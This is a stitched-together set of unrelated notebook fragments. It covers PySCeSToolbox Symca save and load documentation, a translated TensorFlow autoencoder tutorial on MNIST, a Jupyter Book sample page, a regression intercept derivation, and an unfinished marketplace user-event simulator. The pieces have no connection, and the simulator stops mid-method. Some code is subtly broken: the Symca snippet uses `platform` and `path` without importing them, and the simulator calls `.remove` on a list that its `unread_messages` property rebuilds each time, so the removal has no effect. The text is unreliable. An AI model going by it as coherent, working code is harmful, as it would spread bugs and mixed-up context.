If the demand block of `S3` in this pathway consisted of multiple reactions, rather than a single reaction, there would have been an additional `cc_results_N` object containing the control coefficients of that reaction block.
### Saving results
In addition to being able to save parameter scan results (as previously described), a summary of the control coefficient and control pattern results can be saved using the `save_results` method. This saves a `csv` file (by default) to disk to any specified location. If no location is specified, a file named `cc_summary_N` is saved to the `~/Pysces/$modelname/symca/` directory, where `N` is a number starting at 0:
```
sc.save_results()
```
`save_results` has the following optional arguments:
* `file_name`: Specifies a path to save the results to. If `None`, the path defaults as described above.
* `separator`: The separator between fields (*default*: `","`)
The contents of the saved data file are as follows:
```
# the following code requires `pandas` to run
import pandas as pd
# load csv file at default path
results_path = '~/Pysces/lin4_fb/symca/cc_summary_0.csv'
# Correct path depending on platform - necessary for platform independent scripts
if platform == 'win32' and pysces.version.current_version_tuple() < (0,9,8):
results_path = psctb.utils.misc.unix_to_windows_path(results_path)
else:
results_path = path.expanduser(results_path)
saved_results = pd.read_csv(results_path)
# show first 20 lines
saved_results.head(n=20)
```
### Saving/loading sessions
Saving and loading `Symca` sessions is very simple and works similarly to `RateChar`. Saving a session takes place with the `save_session` method, whereas the `load_session` method loads the saved expressions. As with the `save_results` method and most other saving and loading functionality, if no `file_name` argument is provided, files will be saved to the default directory (see also [Basic Usage](basic_usage.ipynb#saving-and-default-directories)). As previously described, expressions can also be loaded/saved automatically by `do_symca` using the `auto_save_load` argument, which saves and loads using the default path. Models with internal fixed metabolites are handled automatically.
```
# saving session
sc.save_session()
# create new Symca object and load saved results
new_sc = psctb.Symca(mod)
new_sc.load_session()
# display saved results
new_sc.cc_results
```
<a href="https://colab.research.google.com/github/bluesky0960/AI_Study/blob/master/AutoEncoder_Conv(TensorFlow_2).ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Autoencoder (TensorFlow 2)
We implement an autoencoder using Keras, the high-level API provided by TensorFlow 2.
* Focused on use within the Google Colab environment.
* TensorFlow 2
* Based on the Keras bundled with TensorFlow 2
References
* [Introduction to TensorFlow](https://www.tensorflow.org/learn)
* [TensorFlow > Learn > TensorFlow Core > Guide > Keras: a quick overview](https://www.tensorflow.org/guide/keras/overview)
* [Deep Learning with Python, by Francois Chollet](https://github.com/fchollet/deep-learning-with-python-notebooks)
Caveat
* If results do not come out correctly in Colab even though the code has no errors, try 'Restart runtime...'.
## Deep neural network basics
Watch the following videos to understand deep-learning techniques based on deep neural networks.
* [But what is a neural network? | Chapter 1, Deep learning (3Blue1Brown)](https://youtu.be/aircAruvnKk)
* [Gradient descent, how neural networks learn | Chapter 2, Deep learning (3Blue1Brown)](https://youtu.be/IHZwWFHWa-w)
* [What is backpropagation really doing? | Deep learning, chapter 3 (3Blue1Brown)](https://youtu.be/Ilg3gGewQ5U)
* [Backpropagation calculus | Deep learning, chapter 4 (3Blue1Brown)](https://youtu.be/tIeHLnjs5U8)
## Setup for TensorFlow 2 and Keras
```
import tensorflow as tf # import TensorFlow
from tensorflow.keras import models, layers # import Keras-related modules
import numpy as np
import matplotlib.pyplot as plt
print(tf.__version__) # check the TensorFlow version
print(tf.keras.__version__) # check the Keras version
```
## Loading the MNIST dataset
* The MNIST dataset is LeCun's handwritten-digit dataset.
* It consists of 60,000 training samples and 10,000 test samples.
### MNIST image data
* The training and test images are stored as 3D tensors.
+ training images: shape = (60000, 28, 28)
+ test images: shape = (10000, 28, 28)
* Note the meaning of the 3D tensor axes:
+ (# of images, image height, image width), i.e. (# of images, # of rows, # of columns)
* To feed each image into a Conv2D layer, we add one more axis via reshape:
+ training images: shape = (60000, 28, 28, 1)
+ test images: shape = (10000, 28, 28, 1)
* Each image is 28 x 28 pixels.
* Each pixel is a uint8 value in [0, 255].
+ Before feeding images into TensorFlow, be sure to convert the pixel values to float32 values in [0, 1].
### MNIST label data
* Each label is a uint8 value in [0, 9].
```
# Load the MNIST data
mnist = tf.keras.datasets.mnist
(train_images, train_labels), (test_images, test_labels) = mnist.load_data()
print('*original* shape and dtype of train_images:',
      train_images.shape, train_images.dtype)
print('*original* shape and dtype of test_images:',
      test_images.shape, test_images.dtype)
# Add a channel axis for the Conv2D layer
train_images = np.reshape(train_images, (len(train_images), 28, 28, 1))
test_images = np.reshape(test_images, (len(test_images), 28, 28, 1))
# Normalizing the images to the range of [0., 1.]
train_images = tf.cast(train_images, tf.float32)
test_images = tf.cast(test_images, tf.float32)
train_images /= 255
test_images /= 255
print('*converted* shape and dtype of train_images:',
      train_images.shape, train_images.dtype)
print('*converted* shape and dtype of test_images:',
      test_images.shape, test_images.dtype)
# Print out for checking
print(train_images[0].shape)
print(train_images[0][0][0].dtype)
print(train_labels.dtype)
```
## Designing the network model
* Encoder model: designed as a Keras Sequential model
+ Takes a (28, 28) image through an InputLayer and outputs an n_dim-dimensional vector.
* Decoder model: designed as a Keras Sequential model
+ Takes an n_dim-dimensional vector through an InputLayer and outputs a (28, 28) image.
* Autoencoder model: built by combining the encoder and decoder
+ Note: an InputLayer must be added so the model can be used directly as a function.
Here we first set n_dim to 2.
* i.e., n_dim = 2
```
n_dim = 2
```
Encoder model definition
* Define a Conv2D layer with 8 filters and kernel_size (2,2) that takes a (28, 28, 1) image as input (padding is set to 'same' so the input and output sizes match).
* A MaxPooling2D layer then halves the spatial size of the image.
* This conv + pool step is repeated twice:
+ conv2d: (28,28,1) -> (28,28,8)
+ maxpooling2d: (28,28,8) -> (14,14,8)
+ conv2d: (14,14,8) -> (14,14,8)
+ maxpooling2d: (14,14,8) -> (7,7,8)
* Flatten vectorizes the input tensor into a 392-vector ((7,7,8) -> 7 x 7 x 8 = 392)
* Fully connected layers reduce the dimension: 392 > 128 > 64 > n_dim
```
enc = tf.keras.models.Sequential([
tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same', input_shape=(28,28,1)),
tf.keras.layers.MaxPooling2D((2,2), padding='same'),
tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),
tf.keras.layers.MaxPooling2D((2,2), padding='same'),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(64, activation='relu'),
tf.keras.layers.Dense(n_dim)
])
```
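The shape bookkeeping in the list above can be checked with plain integer arithmetic, without instantiating the model ('same' padding keeps the spatial size after a convolution; pooling with stride 2 and 'same' padding produces ceil(n/2); `pool_same` is our helper, not a Keras function):

```python
def pool_same(n, stride=2):
    # output size of MaxPooling2D with 'same' padding: ceil(n / stride)
    return -(-n // stride)

h = w = 28                         # input image size
h, w = pool_same(h), pool_same(w)  # conv ('same') keeps 28, pool halves -> 14
h, w = pool_same(h), pool_same(w)  # conv ('same') keeps 14, pool halves -> 7
flat = h * w * 8                   # 8 filters in the last conv layer
print(h, w, flat)                  # -> 7 7 392
```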
Decoder model definition
* Fully connected layers expand the dimension: n_dim > 64 > 128 > 392
* Reshape converts the 392-vector into a (7,7,8) tensor
* Pass it through a Conv2D layer with 8 filters and kernel_size (2,2).
* An UpSampling2D layer then doubles the spatial size of the image (this conv + upsample step is repeated twice):
+ conv2d: (7,7,8) -> (7,7,8)
+ upsampling2d: (7,7,8) -> (14,14,8)
+ conv2d: (14,14,8) -> (14,14,8)
+ upsampling2d: (14,14,8) -> (28,28,8)
* Finally, pass it through a Conv2D layer with a single filter and a sigmoid activation function.
+ conv2d: (28,28,8) -> (28,28,1)
```
dec = tf.keras.models.Sequential([
    tf.keras.layers.InputLayer(input_shape=(n_dim,)), # note: a 1D input tensor must be expressed as (n_dim,)
tf.keras.layers.Dense(64, activation='relu'),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(392, activation='relu'),
tf.keras.layers.Reshape(target_shape=(7,7,8)),
tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),
tf.keras.layers.UpSampling2D((2,2)),
tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),
tf.keras.layers.UpSampling2D((2,2)),
tf.keras.layers.Conv2D(1, (2,2), activation='sigmoid', padding='same'),
])
```
Autoencoder model definition
* Composed of the encoder followed by the decoder
```
ae = tf.keras.models.Sequential([
enc,
dec,
])
```
## Using the network model as a function before training
* Because the autoencoder ae is built as a model, it can now be used as a function [(Effective TensorFlow: functions, not sessions)](https://www.tensorflow.org/guide/effective_tf2?hl=ko#%EC%84%B8%EC%85%98_%EB%8C%80%EC%8B%A0_%ED%95%A8%EC%88%98)
+ Note, however, that the ae function operates on batches:
- it does not simply map (28, 28, 1) -> ae -> (28, 28, 1),
- it processes batches in parallel: (?, 28, 28, 1) -> ae -> (?, 28, 28, 1).
* Since the network has not been trained yet, it will not produce meaningful output at this point.
```
y_pred = ae(train_images)
print('input shape:', train_images.shape)
print('output shape:', y_pred.shape)
```
Check the result for the image train_images[idx]
* Visualize the input / output of ae
```
import ipywidgets as widgets
def io_imshow(idx):
print('GT label:', train_labels[idx])
plt.subplot(121)
plt.imshow(train_images[idx,:,:,0])
plt.subplot(122)
plt.imshow(y_pred[idx,:,:,0])
plt.show()
widgets.interact(io_imshow, idx=widgets.IntSlider(min=0, max=train_images.shape[0]-1, continuous_update=False));
```
## Checking the network model structure
* The summary() function prints the model structure as text.
* The plot_model() function renders the model structure as a diagram.
```
enc.summary()
tf.keras.utils.plot_model(enc, 'enc.png', show_shapes=True)
dec.summary()
tf.keras.utils.plot_model(dec, 'dec.png', show_shapes=True)
ae.summary()
tf.keras.utils.plot_model(ae, 'ae.png', show_shapes=True)
```
## Training the autoencoder instance
Train the autoencoder instance ae
* [compile](https://www.tensorflow.org/api_docs/python/tf/keras/Model#compile) the instance ae
+ cf) this can be understood like compiling a shader program
+ here we specify the [optimizer](https://www.tensorflow.org/api_docs/python/tf/keras/optimizers), [loss](https://www.tensorflow.org/api_docs/python/tf/keras/losses), and [metrics](https://www.tensorflow.org/api_docs/python/tf/keras/metrics) used for training
+ for the theory behind optimizers, see [this article](https://brunch.co.kr/@chris-song/50).
* Train with fit() on the data pair (train_images, train_images); the autoencoder uses the images as both input and target
```
ae.compile(optimizer='Adam', # set the optimizer by name or as an optimizer object
loss='mse',
metrics=['mae'])
ae.fit(train_images, train_images, epochs=10, batch_size=32)
```
Run the ae function again after training
```
y_pred = ae(train_images)
import ipywidgets as widgets
def io_imshow(idx):
    print('GT label:', train_labels[idx])
    plt.subplot(121)
    plt.imshow(train_images[idx,:,:,0])
    plt.subplot(122)
    plt.imshow(y_pred[idx,:,:,0])
    plt.show()
widgets.interact(io_imshow, idx=widgets.IntSlider(min=0, max=train_images.shape[0]-1, continuous_update=False));
```
## Using the encoder / decoder models separately as functions
After training, the autoencoder's enc and dec can each be run on their own as follows.
```
z = enc(train_images)
y_pred = dec(z)
```
## Inspecting the encoding and decoding results
* Check the encoding result for a specific image.
* Verify that feeding a latent coordinate close to an encoding into the decoder produces a similar output.
```
import ipywidgets as widgets
def z_show(idx):
    print(z[idx])
    print('GT label:', train_labels[idx])
widgets.interact(z_show, idx=widgets.IntSlider(min=0, max=train_images.shape[0]-1));
```
Verify that feeding a latent coordinate close to an encoding into the decoder produces a similar output
```
import ipywidgets as widgets
u=widgets.FloatSlider(min=-5.0, max=5.0)
v=widgets.FloatSlider(min=-5.0, max=5.0)
ui = widgets.HBox([u,v])
def z_test(u, v):
    z_in = np.array([[u, v]])  # renamed locally to avoid shadowing the function name
    print(z_in)
    img_gen = dec(z_in)
    plt.imshow(img_gen[0,:,:,0])
    plt.show()
out = widgets.interactive_output(z_test, {'u': u, 'v': v})
display(ui, out)
```
## Visualizing the encoding results
Visualize the z values, the representation produced by the autoencoder's encoder.
```
# Visualize the encoder outputs for the loaded MNIST data
import matplotlib.pyplot as plt
z_list = []
for i in range(0, 10):
    print("z_{} :".format(i), z[train_labels==i].shape)
    z_list.append(z[train_labels == i])
colors = ['red', 'green', 'blue', 'orange', 'purple', 'brown', 'pink', 'gray', 'olive', 'cyan']
for zi, color in zip(z_list, colors):  # zi avoids shadowing z
    plt.scatter(zi[:,0], zi[:,1], color=color)
```
## What the encoding visualization tells us
Visualizing the z values produced by the autoencoder's encoder shows that it fails to learn a representation that is discriminative across labels.
## Using the decoder as a generative model
```
z = np.array([[-1, 0.2],
[0.5, 0.5],
[5, -5]
])
result = dec(z)
print(z.shape)
print(result.shape)
```
Visualize the results
+ [-1, 0.2] falls within the distribution of digit 8.
+ [0.5, 0.5] falls within the distribution of digit 6.
+ [5, -5] falls within the distribution of digit 0.
* However, the generated 8 appears to sit on the ambiguous boundary between 5 and 8.
* This shows that the distributions overlap.
* This motivated the conditional autoencoder, which adds a condition so that the distributions do not overlap.
```
# Visualize the decoded results
import matplotlib.pyplot as plt
plt.subplot(131)
plt.imshow(result[0,:,:,0])
plt.subplot(132)
plt.imshow(result[1,:,:,0])
plt.subplot(133)
plt.imshow(result[2,:,:,0])
```
## Increasing the dimensionality
Increase n_dim from 2 to 7.
```
n_dim = 7
```
## Defining the encoder model
```
enc = tf.keras.models.Sequential([
tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same', input_shape=(28,28,1)),
tf.keras.layers.MaxPooling2D((2,2), padding='same'),
tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),
tf.keras.layers.MaxPooling2D((2,2), padding='same'),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(64, activation='relu'),
tf.keras.layers.Dense(n_dim)
])
```
## Defining the decoder model
```
dec = tf.keras.models.Sequential([
tf.keras.layers.InputLayer(input_shape=(n_dim,)), # note: a 1D input must be written as the tuple (n_dim,)
tf.keras.layers.Dense(64, activation='relu'),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(392, activation='relu'),
tf.keras.layers.Reshape(target_shape=(7,7,8)),
tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),
tf.keras.layers.UpSampling2D((2,2)),
tf.keras.layers.Conv2D(8, (2,2), activation='relu', padding='same'),
tf.keras.layers.UpSampling2D((2,2)),
tf.keras.layers.Conv2D(1, (2,2), activation='sigmoid', padding='same'),
])
```
## Defining the AutoEncoder
```
ae = tf.keras.models.Sequential([
enc,
dec,
])
```
## Training the network
```
ae.compile(optimizer='Adam', # set the optimizer by name or as an optimizer object
loss='mse',
metrics=['mae'])
ae.fit(train_images, train_images, epochs=10, batch_size=32)
```
## Inspecting the trained results
```
y_pred = ae(train_images)
import ipywidgets as widgets
def io_imshow(idx):
    print('GT label:', train_labels[idx])
    plt.subplot(121)
    plt.imshow(train_images[idx,:,:,0])
    plt.subplot(122)
    plt.imshow(y_pred[idx,:,:,0])
    plt.show()
widgets.interact(io_imshow, idx=widgets.IntSlider(min=0, max=train_images.shape[0]-1, continuous_update=False));
```
## Inspecting the encoder outputs
```
z = enc(train_images)
y_pred = dec(z)
import ipywidgets as widgets
def z_show(idx):
    print(z[idx])
    print('GT label:', train_labels[idx])
widgets.interact(z_show, idx=widgets.IntSlider(min=0, max=train_images.shape[0]-1));
```
## Visualizing the distribution of the 7-D encoder outputs with t-SNE
The distribution is more discriminative than it was with n_dim = 2.
```
from sklearn.manifold import TSNE
model = TSNE(learning_rate=100)
transformed = model.fit_transform(z)
xs = transformed[:,0]
ys = transformed[:,1]
plt.scatter(xs,ys,c=train_labels)
plt.show()
```
# Content with notebooks
You can also create content with Jupyter Notebooks. This means that you can include
code blocks and their outputs in your book.
## Markdown + notebooks
As it is markdown, you can embed images, HTML, etc into your posts!


You can also $add_{math}$ and
$$
math^{blocks}
$$
or
$$
\begin{aligned}
\mbox{mean} la_{tex} \\ \\
math blocks
\end{aligned}
$$
But make sure you \$Escape \$your \$dollar signs \$you want to keep!
## MyST markdown
MyST markdown works in Jupyter Notebooks as well. For more information about MyST markdown, check
out [the MyST guide in Jupyter Book](https://jupyterbook.org/content/myst.html),
or see [the MyST markdown documentation](https://myst-parser.readthedocs.io/en/latest/).
## Code blocks and outputs
Jupyter Book will also embed your code blocks and output in your book.
For example, here's some sample Matplotlib code:
```
from matplotlib import rcParams, cycler
import matplotlib.pyplot as plt
import numpy as np
plt.ion()
# Fixing random state for reproducibility
np.random.seed(19680801)
N = 10
data = [np.logspace(0, 1, 100) + np.random.randn(100) + ii for ii in range(N)]
data = np.array(data).T
cmap = plt.cm.coolwarm
rcParams['axes.prop_cycle'] = cycler(color=cmap(np.linspace(0, 1, N)))
from matplotlib.lines import Line2D
custom_lines = [Line2D([0], [0], color=cmap(0.), lw=4),
Line2D([0], [0], color=cmap(.5), lw=4),
Line2D([0], [0], color=cmap(1.), lw=4)]
fig, ax = plt.subplots(figsize=(10, 5))
lines = ax.plot(data)
ax.legend(custom_lines, ['Cold', 'Medium', 'Hot']);
```
There is a lot more that you can do with outputs (such as including interactive outputs)
with your book. For more information about this, see [the Jupyter Book documentation](https://jupyterbook.org)
Next, we can fold the constant term $a$ into the coefficient vector $\mathbf{b}$. This is done by adding an all-ones column to $\mathbf{X}$:
\begin{equation*}
\begin{bmatrix}
y_1\\
y_2\\
. \\
. \\
. \\
y_i
\end{bmatrix}
=
\begin{bmatrix}
1& x_{11} & x_{21} & x_{31} & \ldots & x_{p1}\\
1 & x_{12} & x_{22} & x_{32} & \ldots & x_{p2}\\
&\ldots&\ldots&\ldots&\ldots&\ldots\\
&\ldots&\ldots&\ldots&\ldots&\ldots\\
1& x_{1i} & x_{2i} & x_{3i} & \ldots & x_{pi}
\end{bmatrix}
\cdot
\begin{bmatrix}
a\\
b_1\\
b_2\\
.\\
.\\
b_p
\end{bmatrix}
\end{equation*}
\begin{align*}
y_1&=a+b_1\cdot x_{11}+b_2\cdot x_{21}+\cdots + b_p\cdot x_{p1}\\
y_2&=a+b_1\cdot x_{12}+b_2\cdot x_{22}+\cdots + b_p\cdot x_{p2}\\
\ldots& \ldots\\
y_i&=a+b_1\cdot x_{1i}+b_2\cdot x_{2i}+\cdots + b_p\cdot x_{pi}\\
\end{align*}
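The augmentation described above can be sketched in NumPy: prepending an all-ones column to the data matrix folds the intercept into the coefficient vector (the values below are illustrative, not from the text):

```python
import numpy as np

# toy data: 4 observations, p = 2 predictors (hypothetical values)
X = np.array([[1.0, 2.0],
              [2.0, 0.5],
              [3.0, 1.5],
              [4.0, 3.0]])

# prepend an all-ones column so the first coefficient plays the role of a
X_aug = np.hstack([np.ones((X.shape[0], 1)), X])

# coefficient vector [a, b1, b2]; X_aug @ coef gives a + b1*x1 + b2*x2 per row
coef = np.array([0.5, 2.0, -1.0])
y = X_aug @ coef
print(X_aug.shape)  # (4, 3)
print(y[0])         # 0.5 + 2.0*1.0 - 1.0*2.0 = 0.5
```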
```
import numpy as np
from datetime import datetime, timedelta
import time
# some probabilities should be dynamics, for example:
# buying probability depends on the number of available items
# listing probability increases if user has sold something in the past
# probability of churn increases if user hasn't listed + hasn't bought anything + doesn't have anything in the basket
# instead of using a random choice for time, we should use a distribution (exponential, binomial, normal etc)
events = {
'visit': {
'condition': True,
'inputs': 'timestamp',
'time': [0, 20],
'next_events': ['search', 'list_item', 'do_nothing'],
'probabilities': [0.6, 0.05, 0.35]
},
'create_account': {
'time': [30, 150],
'next_events': ['search', 'list_item', 'do_nothing'],
'probabilities': [0.8, 0.1, 0.1]
},
'list_item': {
'conditions': ['registered'],
'time': [90, 300],
'next_events': ['search', 'list_item', 'do_nothing'],
'probabilities': [0.1, 0.3, 0.6]
},
'search': {
'time': [10, 120],
'next_events': ['search', 'view_item', 'list_item', 'do_nothing'],
'probabilities': [0.35, 0.5, 0.01, 0.14]
},
'view_item': {
'time': [10, 30],
'next_events': ['view_item', 'send_message', 'search', 'add_to_basket', 'list_item', 'do_nothing'],
'probabilities': [0.4, 0.1, 0.2, 0.1, 0.01, 0.19]
},
'send_message': {
'conditions': ['registered'],
'time': [10, 30],
'next_events': ['view_item', 'search', 'add_to_basket', 'do_nothing'],
'probabilities': [0.5, 0.25, 0.05, 0.2]
},
'read_message': {
'conditions': ['n_unread_messages > 0'],
'time': [1, 10],
'next_events': ['answer', 'search', 'list_item', 'do_nothing'],
'probabilities': [0.8, 0.1, 0.01, 0.09]
},
'answer': {
'conditions': ['n_read_messages > 0'],
'time': [5, 120],
'next_events': ['search', 'list_item', 'do_nothing'],
'probabilities': [0.3, 0.01, 0.69]
},
'add_to_basket': {
'conditions': ['registered'],
'time': [5, 120],
'next_events': ['search', 'view_item', 'open_basket', 'do_nothing'],
'probabilities': [0.2, 0.2, 0.45, 0.15]
},
'open_basket': {
'conditions': ['n_items_in_basket > 0'],
'time': [5, 120],
'next_events': ['search', 'remove_from_basket', 'pay', 'list_item', 'do_nothing'],
'probabilities': [0.05, 0.35, 0.45, 0.01, 0.15]
},
'remove_from_basket': {
'conditions': ['n_items_in_basket > 0'],
'time': [1, 20],
'next_events': ['search', 'remove_from_basket', 'pay', 'do_nothing'],
'probabilities': [0.2, 0.2, 0.2, 0.4]
},
'pay': {
'conditions': ['registered', 'n_items_in_basket > 0'],
'time': [180, 1800],
'next_events': ['search', 'do_nothing'],
'probabilities': [0.1, 0.9]
},
'do_nothing': {}
}
def create_event_data(event_name, user_id, timestamp, properties=None):
d = {
'event_name': event_name,
'user_id': user_id,
'timestamp': timestamp
}
if properties is not None:
for p in properties.keys():
d[p] = properties[p]
return d
users = dict()
items = dict()
messages = dict()
class Item:
def __init__(self, item_id, lister_id, listing_date):
self.item_id = item_id
self.lister_id = lister_id
self.listing_date = listing_date
self.status = 'active'
class Message:
def __init__(self, sender_id, recepient_id, message_id, timestamp):
self.sender_id = sender_id
self.recepient_id = recepient_id
self.message_id = message_id
self.timestamp = timestamp
current_date = datetime(2021,4,18,23,10,11)
class User:
def __init__(self, name, user_id):
self.name = name
self.user_id = user_id
self.registered = False
satisfaction_impact = {
'registration': 10,
'message_sent': 1,
'message_read': 1,
'list_item': 10,
'purchase': 20,
'sale': 20,
'delete_item': -20,
'days_listed': -1,
'search': -1,
'item_view': -1
}
@property
def visit_probability(self):
"""Calculate visit_probability as a combination of the initial probability, the satisfaction level, and other factors.
"""
probability_visit_from_satisfaction = 0.01 + self.satisfaction / 1000
if probability_visit_from_satisfaction < 0:
probability_visit_from_satisfaction = 0
elif probability_visit_from_satisfaction > 0.05:
probability_visit_from_satisfaction = 0.05
probability_visit_from_messages = self.n_unread_messages * 0.2
if probability_visit_from_messages > 0.6:
probability_visit_from_messages = 0.6
probability_visit_total = probability_visit_from_satisfaction + probability_visit_from_messages
return probability_visit_total
@property
def satisfaction(self):
"""Calculate user satisfaction level.
"""
satisfaction = 0
if self.registered:
satisfaction += self.satisfaction_impact['registration']
if hasattr(self, 'messages_sent'):
satisfaction += self.n_messages_sent * self.satisfaction_impact['message_sent']
if hasattr(self, 'messages_read'):
satisfaction += self.n_messages_read * self.satisfaction_impact['message_read']
if hasattr(self, 'n_listed_items'):
satisfaction += self.n_listed_items * self.satisfaction_impact['list_item']
if hasattr(self, 'n_purchases'):
satisfaction += self.n_purchases * self.satisfaction_impact['purchase']
if hasattr(self, 'n_sold_items'):
satisfaction += self.n_sold_items * self.satisfaction_impact['sale']
if hasattr(self, 'item_views'):
satisfaction += self.item_views * self.satisfaction_impact['item_view']
if hasattr(self, 'searches'):
satisfaction += self.searches * self.satisfaction_impact['search']
if hasattr(self, 'n_deleted_items'):
satisfaction += self.n_deleted_items * self.satisfaction_impact['delete_item']
if hasattr(self, 'active_items'):
for item_id in self.active_items:
satisfaction += (current_date - items[item_id].listing_date).days * self.satisfaction_impact['days_listed']
return satisfaction
@property
def listing_index(self):
if self.n_sold_items > 0:
index = self.n_sold_items / self.n_listed_items / 0.5
elif self.n_listed_items:
index = 1 - self.n_listed_items * 0.1 if self.n_listed_items <= 10 else 0
else:
index = 1
return index
@property
def items_in_basket(self):
"""Calculate items in basket
"""
return len(self.basket) if hasattr(self, 'basket') else 0
@property
def unread_messages(self):
"""Get list of unread messages
"""
received_messages = self.messages_received if hasattr(self, 'messages_received') else []
read_messages = self.read_messages if hasattr(self, 'read_messages') else []
unread_messages = list(set(received_messages) - set(read_messages))
return unread_messages
@property
def n_listed_items(self):
"""Calculate number of listed items
"""
return len(self.listed_items) if hasattr(self, 'listed_items') else 0
@property
def n_active_items(self):
"""Calculate number of active items
"""
return len(self.active_items) if hasattr(self, 'active_items') else 0
@property
def n_deleted_items(self):
"""Calculate number of deleted items
"""
return len(self.deleted_items) if hasattr(self, 'deleted_items') else 0
@property
def n_items_in_basket(self):
"""Calculate number of items in basket
"""
return len(self.basket) if hasattr(self, 'basket') else 0
@property
def n_sold_items(self):
"""Calculate number of sold items
"""
return len(self.sold_items) if hasattr(self, 'sold_items') else 0
@property
def n_purchases(self):
"""Calculate number of purchased items
"""
return len(self.purchased_items) if hasattr(self, 'purchased_items') else 0
@property
def n_messages_sent(self):
"""Calculate number of sent messages
"""
return len(self.messages_sent) if hasattr(self, 'messages_sent') else 0
@property
def n_messages_received(self):
"""Calculate number of received messages
"""
return len(self.messages_received) if hasattr(self, 'messages_received') else 0
@property
def n_unread_messages(self):
"""Calculate number of unread messages
"""
return len(self.unread_messages) if hasattr(self, 'unread_messages') else 0
@property
def n_read_messages(self):
"""Calculate number of read messages
"""
return len(self.messages_read) if hasattr(self, 'messages_read') else 0
def visit(self, platform, country, timestamp):
"""User visit event.
It's the first touch with the app within a session.
Event creates / updates user attributes:
visits: number of visits.
last_visit: time of the last visit.
last_activity: time of the last activity.
last_properties: properties like platform and country.
Parameters:
timestamp: time of the event.
platform: platform of the visit: 'ios', 'android', 'web'.
country: country code of the visit: 'US', 'DE', 'GB' etc.
"""
self.active_session = True
self.last_event = 'visit'
self.last_activity = timestamp
self.visits = self.visits + 1 if hasattr(self, 'visits') else 1
self.last_visit = timestamp
self.last_properties = {
'platform': platform,
'country': country
}
print(self.last_event, timestamp)
def create_account(self, timestamp):
"""User creates an account.
Parameters:
timestamp: time of the event.
"""
self.last_event = 'create_account'
self.last_activity = timestamp
self.registered = True
self.registration_date = timestamp
print(self.last_event, timestamp)
def send_message(self, timestamp):
"""User sends message to another user.
Parameters:
recepient_id: id of the user who receives the message.
timestamp: time of the event.
"""
self.last_event = 'send_message'
self.last_activity = timestamp
# create message id
recepient_id = items[self.open_item].lister_id
message_id = hash(str(self.user_id) + str(recepient_id) + str(timestamp))
# add messages to user attributes
if hasattr(self, 'messages_sent'):
self.messages_sent.append(message_id)
else:
self.messages_sent = [message_id]
# store data to messages dict
messages[message_id] = Message(sender_id=self.user_id,
recepient_id=recepient_id,
message_id=message_id,
timestamp=timestamp)
# update recepient attributes
if hasattr(users[recepient_id], 'messages_received'):
users[recepient_id].messages_received.append(message_id)
else:
users[recepient_id].messages_received = [message_id]
print(self.last_event, timestamp)
def read_message(self, timestamp):
"""User reads a random unread message from another user.
Parameters:
timestamp: time of the event.
"""
self.last_event = 'read_message'
self.last_activity = timestamp
rand = np.random.default_rng(seed=abs(hash(timestamp)))
message_id = rand.choice(a=self.unread_messages)
self.unread_messages.remove(message_id)
# store message to user's read messages
if hasattr(self, 'read_messages'):
self.read_messages.append(message_id)
else:
self.read_messages = [message_id]
print(self.last_event, timestamp)
def answer(self, timestamp):
"""User answers the most recently read message.
Parameters:
timestamp: time of the event.
"""
self.last_event = 'answer'
self.last_activity = timestamp
# get sender_id who will be recepient of the next message
message_id = self.read_messages[-1]
recepient_id = messages[message_id].sender_id
# create new message_id
new_message_id = hash(str(self.user_id) + str(recepient_id) + str(timestamp))
# add messages to user attributes
if hasattr(self, 'messages_sent'):
self.messages_sent.append(new_message_id)
else:
self.messages_sent = [new_message_id]
# store data to messages dict
messages[new_message_id] = Message(sender_id=self.user_id,
recepient_id=recepient_id,
message_id=new_message_id,
timestamp=timestamp)
# update recepient attributes
if hasattr(users[recepient_id], 'messages_received'):
users[recepient_id].messages_received.append(new_message_id)
else:
users[recepient_id].messages_received = [new_message_id]
print(self.last_event, timestamp)
def list_item(self, timestamp):
"""User lists an item.
Parameters:
timestamp: time of the event.
"""
self.last_event = 'list_item'
self.last_activity = timestamp
item_id = hash(str(self.user_id) + str(timestamp))
if hasattr(self, 'listed_items'):
self.listed_items.append(item_id)
else:
self.listed_items = [item_id]
if hasattr(self, 'active_items'):
self.active_items.append(item_id)
else:
self.active_items = [item_id]
items[item_id] = Item(item_id=item_id,
lister_id=self.user_id,
listing_date=timestamp)
print(self.last_event, timestamp)
def search(self, timestamp):
"""User performs a search.
Parameters:
timestamp: time of the event.
"""
self.last_event = 'search'
self.searches = self.searches + 1 if hasattr(self, 'searches') else 1
self.last_activity = timestamp
rand = np.random.default_rng(seed=abs(hash(timestamp)))
self.available_items = rand.choice(a=list(items.keys()), size=20 if len(items.keys())>=20 else len(items.keys()), replace=False)
print(self.last_event, timestamp)
def view_item(self, timestamp):
"""User views an item.
Parameters:
timestamp: time of the event.
"""
self.last_event = 'view_item'
self.last_activity = timestamp
self.item_views = self.item_views + 1 if hasattr(self, 'item_views') else 1
rand = np.random.default_rng(seed=abs(hash(timestamp)))
item_id = rand.choice(a=self.available_items)
self.open_item = item_id
items[item_id].views = items[item_id].views + 1 if hasattr(items[item_id], 'views') else 1
print(self.last_event, timestamp)
def add_to_basket(self, timestamp):
"""User adds an item to the basket.
Parameters:
timestamp: time of the event.
"""
self.last_event = 'add_to_basket'
self.last_activity = timestamp
if hasattr(self, 'basket'):
self.basket.append(self.open_item)
else:
self.basket = [self.open_item]
print(self.last_event, timestamp)
def open_basket(self, timestamp):
"""User opens the basket.
Parameters:
timestamp: time of the event.
"""
self.last_event = 'open_basket'
self.last_activity = timestamp
print(self.last_event, timestamp)
def remove_from_basket(self, timestamp):
"""User removes an item from the basket.
Parameters:
timestamp: time of the event.
"""
self.last_event = 'remove_from_basket'
self.last_activity = timestamp
rand = np.random.default_rng(seed=abs(hash(timestamp)))
item_id = rand.choice(a=self.basket)
